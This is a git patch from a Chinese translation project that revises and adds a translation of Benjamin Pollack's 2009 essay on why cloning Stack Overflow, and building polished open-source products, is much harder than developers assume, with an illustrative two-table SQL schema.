8bit --- ...The One in Which I Call Out Hacker News.md | 108 ++++++------------ 1 file changed, 38 insertions(+), 70 deletions(-) diff --git a/translated/tech/20090701 The One in Which I Call Out Hacker News.md b/translated/tech/20090701 The One in Which I Call Out Hacker News.md index 670be95353..30e796cb8a 100644 --- a/translated/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/translated/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,99 +1,67 @@ -我号召黑客新闻的理由之一 +因为这个,我找 Hacker News 期刊理论了一番 + 实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? -不,你没有。 -我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间,这是程序员永远的 -乐观主义。 -- Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 +不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 +- 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 -指责开源软件的使用存在着高昂的代价已经不是一个新论点了,它之前就被提过,而且说的比我更有信服力,即使一些人已经在高度赞扬开源软件的运作。 -这种事为什么会重复发生? +指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? -在周一的黑客新闻上,我愉悦地看着某些人一边说写 Stack Overflow 简单的简直搞笑,一边通过允许七月第四个周末之后的克隆来开始备份他们的提问。 -其他的声明中也指出现存的克隆是一个好的出发点。 +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个StackOverflow可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 -让我们假设,为了争辩,你觉得将自己的 Stack Overflow 通过 ASP.NET 和 MVC 克隆是正确的,然后被一块廉价的手表和一个小型俱乐部头领忽悠之后, -决定去手动拷贝你 Stack Overflow 的源代码,一页又一页,所以你可以逐字逐句地重新输入,我们同样会假定你像我一样打字,很酷的有 100 WPM -(差不多每秒8个字符),不和我一样的话,你不会犯错。 +秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词(也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少80个小时的时间。 - Stack Overflow 的 *.cs、*.sql、*.css、*.js 和 *.aspx 文件大约 2.3 MB,因此如果你想将这些源代码输进电脑里去的话,即使你不犯错也需要大约 80 个小时。 +或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭源 StackOverflow 代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 -除非......当然,你是不会那样做的:你打算从头开始实现 Stack Overflow 。所以即使我们假设,你花了十倍的时间去设计、输出,然后调试你自己的实现而不是去拷 -贝已有的那份,那已经让你已经编译了好几个星期。我不知道你,但是我可以承认我写的新代码大大小于我复制的现有代码的十分之一。 +好的,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧* -好,ok,我听见你松了口气。所以不是全部。但是我可以做大部分。 +好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统来显示大家对某个答案是赞同还是反对。只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 +与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 -行,所以什么是大部分?这只是询问和回答问题,这个部分很简单。那么,除了你必须实现对问题和答案投票、赞同还是反对,而且提问者应该能够去接收每一个问题的 -单一答案。你不能让人们赞同或者反对他们自己的回答。所以你需要去阻止。你需要去确保用户在一定的时间内不会赞同或反对其他用户太多次。以预防垃圾邮件, -你可能也需要去实现一个垃圾邮件过滤器,即使在一个基本的设计里,也要考虑到这一点。而且还需要去支持用户图标。并且你将不得不寻找一个自己真正信任的并且 -与 markdown 接合很好的 HTML 库(当然,你确实希望重新使用那个令人敬畏的编辑器 Stack Overflow ),你还需要为所有控件购买,设计或查找小部件,此外 -你至少需要一个基本的管理界面,以便用户可以调节,并且你需要实现可扩展的业务量,以便能稳定地给用户越来越多的功能去实现他们想做的。 +但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 -如果你这样做了,你可以完成它。 +除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 slashdot,reddit 或是 StackOverflow 这些动作影响到。 -除了...除了全文检索外,特别是它在“寻找问题”功能中的表现,这是必不可少的。然后用户的基本信息,和回答的意见,然后有一个主要展示你的重要问题, -但是它会稳定的冒泡式下降。另外你需要去实现奖励,并支持每个用户的多个 OpenID 登录,然后为相关的事件发送邮件通知,并添加一个标签系统, -接着允许管理员通过一个不错的图形界面配置徽章。你需要去显示用户的 karma 历史,点赞和差评。整个事情的规模都非常好,因为它随时都可以被 - slashdotted、reddited 或是 Stack Overflow 。 +在这之后!你会以为你基本已经大功告成了! -在这之后!你就已经完成了! +...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的CSS设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 -...在正确地实现升级、国际化、业绩上限和一个 css 设计之后,使你的站点看起来不像是一个屁股,上面的大部分 AJAX 版本和 G-d 知道什么会同样潜伏 -在你所信任的界面下,但是当你开始做一个真正的克隆的时候,就会遇到它。 +那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? -告诉我:这些功能中哪个是你感觉可以削减而让它仍然是一个引人注目的产品,哪些是大部分网站之下的呢?哪个你可以剔除呢? +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也正是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 -开发者因为开源软件的使用是一个可怕的痛苦这样一个相同的理由认为克隆一个像 Stack Overflow 的站点很简单。当你把一个开发者放在 Stack Overflow 前面, -他们并不真的看到 Stack Overflow,他们实际上看的是这些: create table QUESTION (ID identity primary key, - TITLE varchar(255), --- 为什么我知道你认为是 255 - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - USER integer references USER(ID)); + TITLE varchar(255), --- 为什么我知道你认为是 255 + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); create table RESPONSE (ID identity primary key, - BODY text, - UPVOTES integer not null default 0, - DOWNVOTES integer not null default 0, - QUESTION integer references QUESTION(ID)) + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) -如果你告诉一个开发者去复制 Stack Overflow ,进入他脑海中的就是上面的两个 SQL 表和足够的 HTML 文件来显示它们,而不用格式化,这在一个周末里是完全 -可以实现的,聪明的人会意识到他们需要实现登陆、注销和评论,点赞需要绑定到用户。但是这在一个周末内仍然是完全可行的。这仅仅是在 SQL 后端里加上两张 -左右的表,而 HTML 则用来展示内容,使用像 Django 这样的框架,你甚至可以免费获得基本的用户和评论。 -但是那不是和 Stack Overflow 相关的,无论你对 Stack Overflow 的感受如何,大多数访问者似乎都认为用户体验从头到尾都很流畅,他们感觉他们和一个 -好产品相互影响。即使我没有更好的了解,我也会猜测 Stack Overflow 在数据库模式方面取得了持续的成功-并且有机会去阅读 Stack Overflow 的源代码, -我知道它实际上有多么的小,这些是一个极大的 spit 和 Polish 的集合,成为了一个具有高可用性的主要网站,一个开发者,问一个东西被克隆有多难, -仅仅不认为和 Polish 相关,因为 Polish 是实现结果附带的。 +如果你让这些开发者去实现 Stack Overflow,进入他脑海中的就是上面的两个SQL表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 -这就是为什么 Stack Overflow 的开放源代码克隆会失败,即使一些人在设法实现大部分 Stack Overflow 的“规范”,也会有一些关键区域会将他们绊倒, -举个例子,如果你把目标市场定在了终端用户上,你要么需要一个图形界面去配置规则,要么聪明的开发者会决定哪些徽章具有足够的通用性,去继续所有的 -安装,实际情况是,开发者发牢骚和抱怨你不能实现一个真实的综合性的像 badges 的图形用户界面,然后 bikeshed 任何的建议,为因为标准的 badges -在范围内太远,他们会迅速避开选择其他方向,他们最后会带着相同的有 bug 追踪器的解决方案赶上,就像他们工作流程的概要使用一样: -开发者通过任意一种方式实现一个通用的机制,任何一个人完全都能轻松地使用 Python、PHP 或任意一门语言中的系统 API 来工作,能简单为他们自己增加 -自定义设置,PHP 和 Python 是学起来很简单的,并且比起曾经的图形界面更加的灵活,为什么还要操心其他事呢? +但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 Stackoverflow 的源码之后,我得以印证了自己的想法,Stackoverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 -同样的,节制和管理界面可以被削减。如果你是一个管理员,你可以进入 SQL 服务器,所以你可以做任何真正的管理-就像这样,管理员可以通过任何的 Django -管理和类似的系统给你提供支持,因为,毕竟只有少数用户是 mods,mods 应该理解网站是怎么运作、停止的。当然,没有 Stack Overflow 的接口失败会被纠正 -,即使 Stack Overflow 的愚蠢的要求,你必须知道如何去使用 openID (它是最糟糕的缺点)最后得到修复。我确信任何的开源的克隆都会狂热地跟随它- -即使 GNOME 和 KDE 多年来亦步亦趋地复制 windows ,而不是尝试去修复它自己最明显的缺陷。 +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 Stack Overflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) -开发者可能不会关心应用的这些部分,但是最终用户会,当他们尝试去决定使用哪个应用时会去考虑这些。就好像一家好的软件公司希望通过确保其产品在出货之前 -是一流的来降低其支持成本一样,所以,同样的,懂行的消费者想在他们购买这些产品之前确保产品好用,以便他们不需要去寻求帮助,开源产品就失败在这种地方 -,一般来说,专有解决方案会做得更好。 +同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计 - 即要求用户必须拥有一个 OpenID 并知道如何使用它 - 在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 -这不是说开源软件没有他们自己的立足之地,这个博客运行在 Apache,Django,PostgreSQL 和 Linux 上。但是让我告诉你,配置这些堆栈不是为了让人心灰意懒 -,PostgreSQL 需要在老版本上移除设置。然后,在 Ubuntu 和 FreeBSD 最新的版本上,仍然要求用户搭建第一个数据库集群,MS SQL不需要这些东西,Apache... -天啊,甚至没有让我开始尝试去向一个初学者用户解释如何去得到虚拟机,MovableType,一对 Django 应用程序,而且所有的 WordPress 都可以在一个单一的安装下 -顺利运行,像在地狱一样,只是试图解释 Apache 的分叉线程变换给技术上精明的非开发人员就是一个噩梦,IIS 7 和操作系统的 Apache 服务器是非常闭源的, -图形界面管理程序配置这些这些相同的堆栈非常的简单,Django 是一个伟大的产品,但是它只是基础架构而已,我认为开源软件做的很好,恰恰是因为推动开发者去 -贡献的动机 -下次你看见一个你喜欢的应用,认为所有面向用户的细节非常长和辛苦,就会去让它用起来更令人开心,在谴责你如何能普通的实现整个的可恶的事在一个周末, -十分之九之后,当你认为一个应用的实现简单地简直可笑,你就完全的错失了故事另一边的用户 +开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低之后的售后维护支持成本一样,懂行的消费者也会想要在他们购买这些产品之前就确保产品好用,以便他们不需要在使用的时候不知所措,然后去打电话给售后服务来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 + +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而且即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及尝试给哪个新的用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项正是在这种基础构架的开发和创新上,这也是驱使开发者贡献开源的最本真的动力。 + + +所以我的结论是,如果下次你再看到一个你喜欢的应用程序,请好好细心地揣摩一下这款产品,揣摩一下所有的那些针对用户的体贴入微的设计细节。而不是武断的认为你可以轻轻松松的再一周之内就用开源工具做一个和这个应用一摸一样的产品出来。那些认为制作和实现一个应用程序如此简单的人,十之八九都是因为忽略了软件开发的最终产品是要交给用户去用的。 via: https://bitquabit.com/post/one-which-i-call-out-hacker-news/ -作者:Benjamin Pollack 译者:hopefully2333 校对:校对者ID +作者:Benjamin Pollack 译者:hopefully2333 校对:yunfengHe 本文由 LCTT 原创编译,Linux中国 荣誉推出 From 7e914e66ebbaac55ead581a5a9d4878680df6cf5 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Fri, 15 Dec 2017 00:19:22 +0800 Subject: [PATCH 0562/1627] v1 --- ...The One in Which I Call Out Hacker News.md | 67 +++++++++++++++++++ ...The One in Which I Call Out Hacker News.md | 6 +- 2 files changed, 72 insertions(+), 1 deletion(-) create mode 100644 20090701 The One in Which I Call Out Hacker News.md diff --git a/20090701 The One in Which I Call Out Hacker News.md b/20090701 The One in Which I Call Out Hacker News.md new file mode 100644 index 0000000000..30e796cb8a --- /dev/null +++ b/20090701 The One in Which I Call Out Hacker News.md @@ -0,0 +1,67 @@ +因为这个,我找 Hacker News 期刊理论了一番 + +实现高速缓存会花费 30 个小时,你有额外的 30 个小时吗? +不,你没有。我实际上并不知道它会花多少时间,可能它会花五分钟,你有五分钟吗?不,你还是没有。为什么?因为我在撒谎。它会消耗远超五分钟的时间。这一切把问题简单化的假设都只不过是程序员永远的乐观主义。 +- 出自 Owen Astrachan 教授于 2004 年 2 月 23 日在 CPS 108 上的讲座 + +指责开源软件总是离奇难用已经不是一个新论点了。这样的论点之前就被很多比我更为雄辩的人提及过,甚至是出自一些人非常推崇开源软件的人士口中。那么为什么我要在这里老调重弹呢? + +在周一的 Hacker News 期刊上,一段文章把我逗乐了。文章谈到,一些人认为编写代码实现一个StackOverflow可以简单到搞笑的程度,并自信的声称他们可以在7月4号的周末就写出一版和 StackOverflow 原版一摸一样的程序,以此来证明这一切是多么容易。另一些人则插话说,现有的那些仿制产品就已经是一个很好的例证了。 + +秉承着自由讨论的精神,我们来假设一个场景。你在思考之后认为你可以用 ASP.NET MVC 来编写一套你自己的 StackOverflow 。我呢,在被一块儿摇晃着的怀表催眠之后,脑袋又挨了别人一顿棒槌,然后像个二哈一样一页一页的把 StackOverflow 的源码递给你,让你照原样重新拿键盘逐字逐句的在你的环境下把那些代码再敲一遍,做成你的 StackOverflow。假设你可以向我一样打字飞快,一分钟能敲100个词(也就是大约每秒敲八个字母),但是却可以牛叉到我无法企及的打字零错误率。从 StackOverflow 的大小共计2.3MB的源码来估计(包括.CS, .SQL, .CSS, .JS 和 .aspx文件),就单单是照着源代码这么飞速敲一遍而且一气呵成中间一个字母都不错,你也要差不多用掉至少80个小时的时间。 + +或者你打算从零开始编码实现你自己的 StackOverflow,虽然我知道你肯定是不会那样做的。我们假设你从设计程序,到敲代码,再到最终完成调试只需要区区十倍于抄袭源 StackOverflow 代码的时间。即使在这样的假设条件下,你也要耗费几周的时间昼夜不停得狂写代码。不知道你是否愿意,但是至少我可以欣然承认,如果只给我照抄源 StackOverflow 代码用时的十倍时间来让我自己写 StackOverflow, 我可是打死也做不到。 + +好的,我知道你在听到这些假设的时候已经开始觉得泄气了。*你在想,如果不是全部实现,而只是实现 StackOverflow 大部分的功能呢?这总归会容易很多了吧* + +好的,问题是什么是大部分功能?如果只去实现提问和回答问题的功能?这个部分应该很简单吧。其实不然,因为实现问和答的功能还要求你必须做出一个对问题和其答案的投票系统来显示大家对某个答案是赞同还是反对。只有这样你才能保证提问者可以得到这个问题的唯一的可信答案。当然,你还不能让人们赞同或者反对他们自己给出的答案,所以你还要去实现这种禁止自投自票的机制。除此之外,你需要去确保用户在一定的时间内不能赞同或反对其他用户太多次,以此来防止有人用机器人程序作弊乱投票。你很可能还需要去实现一个垃圾评论过滤器,即使这个过滤器很基础很简陋,你也要考虑如何去设计它。而且你恐怕还需要去支持用户图标(头像)的功能。并且你将不得不寻找一个自己真正信任的并且 +与 Markdown 接合很好的干净的 HTML 库(当然,假设你确实想要复用 StackOverflow 的那个超棒的编辑器 )。你还需要为所有控件购买或者设计一些小图标小部件,此外你至少需要实现一个基本的管理界面,以便那些喜欢捣鼓的用户可以调整和改动他们的个性化设置。并且你需要实现类似于 Karma 的声望累积系统,以便用户可以随着不断地使用来稳步提升他们的话语权和解锁更多的功能以及可操作性。 + +但是如果你实现了以上所有功能,可以说你就已经把要做的都做完了。 + +除非...除非你还要做全文检索功能。尤其是在“边问边搜”(动态检索)的特性中,支持全文检索是必不可少的。此外,录入和显示用户的基本信息,实现回答的评论功能,以及实现一个显示热点提问的页面,以及热点问题和帖子随着时间推移冷却下去沉下去的这些功能,都将是不可或缺的。另外你肯定还需要去实现回答奖励系统,并支持每个用户用多个不同的 OpenID 账户去登录,然后将这些相关的登陆事件通过邮件发送出去来通知用户,并添加一个标签或徽章系统,接着允许管理员通过一个不错的图形界面来配置这些标签和徽章(Badge)。你需要去显示用户的 Karma 历史,点赞和差评。而且整个页面还需要很流畅的展开和拉伸,因为这个系统的页面随时都可能被 slashdot,reddit 或是 StackOverflow 这些动作影响到。 + +在这之后!你会以为你基本已经大功告成了! + +...为了产品的完整性,在上面所述的工作都完成之后,你又奋不顾身的去实现了升级功能,界面语言的国际化,Karma 值上限,以及让网站更专业的CSS设计,AJAX,还有那些看起来理所当然做起来却让人吐血的功能和特性。如果你不是真的动手来尝试做一个和 StackOverflow 一摸一样的系统,你肯定不会意识到在整个程序设计实施的过程中,你会踩到无数的鬼才会知道的大坑。 + +那么请你告诉我:如果你要做一个让人满意的类似产品出来,上述的哪一个功能是你可以省略掉的呢?哪些是“大部分”网站都具备的功能,哪些又不是呢? + +正因为这些很容易被忽视的问题,开发者才会以为做一个 StackOverflow 的仿制版产品会很简单。也正是因为这些被忽视了的因素,开源软件才一直让人用起来很痛苦。因为看似简单的功能,做起来却总是布满荆棘。很多软件开发人员在看到 StackOverflow 的时候,他们并不能察觉到 StackOverflow 产品的全貌。他们会简单的把 Stackoverflow 的实现抽象成下面一段逻辑和代码 + + +create table QUESTION (ID identity primary key, + TITLE varchar(255), --- 为什么我知道你认为是 255 + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + USER integer references USER(ID)); +create table RESPONSE (ID identity primary key, + BODY text, + UPVOTES integer not null default 0, + DOWNVOTES integer not null default 0, + QUESTION integer references QUESTION(ID)) + + +如果你让这些开发者去实现 Stack Overflow,进入他脑海中的就是上面的两个SQL表和一个用以呈现表格数据的 HTML 文件。他们甚至会忽略数据的格式问题,进而单纯的以为他们可以在一个周末的时间里就把 StackOverflow 做出来。一些稍微老练的开发者可能会意识到他们还要去实现登陆和注销功能,评论功能,投票系统,但是仍然会自信的认为这不过也就是利用一个周末就能完成了;因为这些功能也不过意味着在后端多了几张 SQL 表和 HTML 文件。如果借助于 Django 之类的构架和工具,他们甚至可以直接拿来主义地不花一分钱就实现用户登陆和评论的功能。 + +但这种简单的实现却远远不能体现出 StackOverflow 的精髓。无论你对 StackOverflow 的感觉如何,大多数使用者似乎都同意 StackOverflow 的用户体验从头到尾都很流畅。使用 StackOverflow 的过程就是在跟一个精心打磨过的产品在愉快地交互。即使我没有深入了解过 StackOverflow ,我也能猜测出这个产品的成功和它数据库的 Schema 没有多大关系 - 实际上在有幸研读过 Stackoverflow 的源码之后,我得以印证了自己的想法,Stackoverflow 的成功确实和它的数据库设计关系甚小。真正让它成为一个极其易用的网站的原因,是它背后各种精雕细琢的设计和实施。多数的开发人员在谈及仿制和克隆一款产品的难度时,真的很少会去考虑到产品背后的打磨和雕琢工作,因为他们认为这些打磨和雕琢都是偶然的,甚至是无足轻重的。 + +这就是为什么用开源工具去克隆和山寨 StackOverflow 其实是很容易失败的。即使这些开源开发者只是想去实现 Stack Overflow 的主要的“规范和标准特性”,而非全面的高级特性,他们也会在实现的过程中遇到种种关键和核心的问题,让他们阴沟翻船,半途而废。拿 Badge (徽章功能)来说,如果你要针对普通终端用户来设计 Badge , 则要么需要实现一个用户可用来个性化设置 bagdge 的 GUI,要么则取巧的设计出一个比较通用的 Badge 供所有的安装版本来使用。而开源设计的实际情况是,开发者会有很多的抱怨和牢骚,认为给 Badge 这种东西设计一个功能全面的 GUI 是根本不肯能的。而且他们会固执地把任何标准 badge 的提案踢回去,踢出第一宇宙速度,击穿地壳甩到地球的另一端。最终这些开发者还是会搞出一个类似于 Roundup 的 bug tracker 正在使用的流程和方案:即实现一个通用的机制, 以便那些可以自如使用基于 Python 或 Php 或其他语言的 的系统API的人可以轻松的定制化他们自己的 Badge。而且老实说,PHP 和 Python 比任何可能的 GUI 接口要 好用和强大得多,谁还会考虑 GUI 的方案呢?(出自开源开发者的想法) + +同样的,开源开发者会认为那些系统设置和管理员界面也一样可以省略掉。在他们看来,假如你是一个管理员,有 SQL 服务器的权限,那么你就理所当然的具备那些系统管理员该有的知识和技能。那么你其实可以使用 Djang-admin 或者任何类似的工具来轻松的对 StackOverflow 做很多设置和改造工作。毕竟如果你是一个 mods (懂如何mod的人)那么你肯定知道网站是怎么工作的,懂得如何利用专业工具去设置和改造一个网站。对啊!这不就得了! 毋庸置疑,在开源开发者重做他们自己的 StackOverflow 的时候,他们也不会把任何 StackOverflow 在接口上面的失败设计纠正过来。即使是原版 StackOverflow 里面最愚蠢最失败的那个设计 - 即要求用户必须拥有一个 OpenID 并知道如何使用它 - 在某个将来最终被 StackOverflow 删除和修正掉了, 我相信正在复制 StackOverflow 模式的那些开源克隆产品也还是会不假思索的把这个 OpenID 的功能仿制出来。这就好比是 GNOME 和 KDE 多年以来一直在做的事情,他们并没有把精力放在如何在设计之初就避免 Windows 的那些显而易见的毛病和问题,相反的确是在亦步亦趋的重复着 Windows 的设计,想办法用开源的方式做出一个比拟 Windows 功能的系统。 + + +开发者可能不会关心一个应用的上述设计细节,但是终端用户一定会。尤其是当他们在尝试去选择要使用哪个应用的时候,这些终端用户更会重视这些接口设计是否易用。就好像一家好的软件公司希望通过确保其产品在出货之前就有一流的质量,以降低之后的售后维护支持成本一样,懂行的消费者也会想要在他们购买这些产品之前就确保产品好用,以便他们不需要在使用的时候不知所措,然后去打电话给售后服务来解决问题。开源产品就失败在这里,而且相当之失败。一般来讲,付费软件则在这方面做得好很多。 + +这不是说开源软件没有自己的立足之地,这个博客就运行在 Apache,Django,PostgreSQL 和 Linux 搭建的开源系统之上。但是让我来告诉你吧,配置这些堆栈可不是谁都可以做的。老版本的 PostgreSQL 需要手工配置 Vacuuming 来确保数据库的自动清理,而且即使是最新版本的 ubuntu 和 FreeBSD 也仍然要求用户去手工配置他们的第一个数据库集群。 +相比之下,MS SQL (微软的 SQL) 则不需要你手工配置以上的任何一样东西。至于 Apache ... 我的天,Apache 简直复杂到让我根本来不及尝试给哪个新的用户讲解我们如何可以通过一个一次性的安装过程就能把虚拟机,MovableType,几个 Diango apps 和 WordPress 配置在一起并流畅地使用。单单是给那些技术背景还不错但并非软件开发者的用户解释清楚 Apache 的那些针对多进程和多线程的设置参数就已经够我喝一壶的了。相比之下,微软的 IIS 7 或者是使用了 OS X 服务器的那个几乎闭源的 GUI 管理器的 Apache ,在配置的时候就要简单上不止一个数量级了。Django 确实是一个好的开源产品,但它也只是一个基础构架,而并非是一个可以直接面向终端普通用户的商业产品。而开源真正的强项正是在这种基础构架的开发和创新上,这也是驱使开发者贡献开源的最本真的动力。 + + 